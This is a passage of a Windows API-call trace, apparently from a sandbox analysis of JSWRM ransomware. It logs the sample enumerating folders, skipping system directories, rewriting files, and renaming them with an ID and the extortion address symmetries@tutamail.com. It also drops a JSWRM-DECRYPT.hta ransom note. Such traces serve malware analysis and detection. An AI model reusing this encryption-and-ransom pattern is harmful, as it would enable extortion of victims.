dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.245] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0059.245] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.245] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=72076) returned 1 [0059.245] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.245] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11980) returned 0x2471a8 [0059.246] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11980, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x11980, lpOverlapped=0x0) returned 1 [0059.253] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.253] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11980, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x11980, lpOverlapped=0x0) returned 1 [0059.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.254] CloseHandle (hObject=0x3d4) returned 1 [0059.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0059.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0059.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0059.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0059.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2173b0 [0059.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0059.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0059.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2173b0 | out: hHeap=0x1e0000) returned 1 [0059.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.256] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0059.257] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.257] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0059.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241290, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0059.257] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x240fe8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0059.257] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0059.258] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.258] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0059.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0059.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.258] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1038", cAlternateFileName="")) returned 1 [0059.258] lstrcmpiW (lpString1="1038", lpString2=".") returned 1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="..") returned 1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="...") returned 1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="windows") returned -1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="recovery") returned -1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="perflogs") returned -1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="documents and settings") returned -1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="$RECYCLE.BIN") returned 1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="system volume information") returned -1 [0059.258] lstrcmpiW (lpString1="1038", lpString2="msocache") returned -1 [0059.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0059.258] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225b30 [0059.258] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0059.258] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1038\\jswrm-decrypt.hta")) returned 0xffffffff [0059.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225b30 | out: hHeap=0x1e0000) returned 1 [0059.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.259] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0059.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0059.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0059.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0059.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0059.260] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1038\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.261] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.261] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.262] CloseHandle (hObject=0x450) returned 1 [0059.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0059.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0059.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0059.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0059.263] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1038\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1038\\jswrm-decrypt.hta")) returned 0x20 [0059.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0059.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.263] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19fb48a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x231f40 [0059.263] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.263] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x19fb48a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.263] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.263] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.263] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.263] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0059.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.263] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0059.263] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0059.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0059.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0059.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.264] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c068 [0059.264] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.264] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=4254) returned 1 [0059.264] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1090) returned 0x23dc88 [0059.264] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0x1090, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0x1090, lpOverlapped=0x0) returned 1 [0059.266] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.266] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0x1090, lpOverlapped=0x0) returned 1 [0059.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.266] CloseHandle (hObject=0x3d4) returned 1 [0059.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0059.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0059.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0059.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0059.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0059.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.267] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.267] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0059.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c068 | out: hHeap=0x1e0000) returned 1 [0059.268] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19fb48a8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x19fb48a8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x19fb48a8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.268] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", 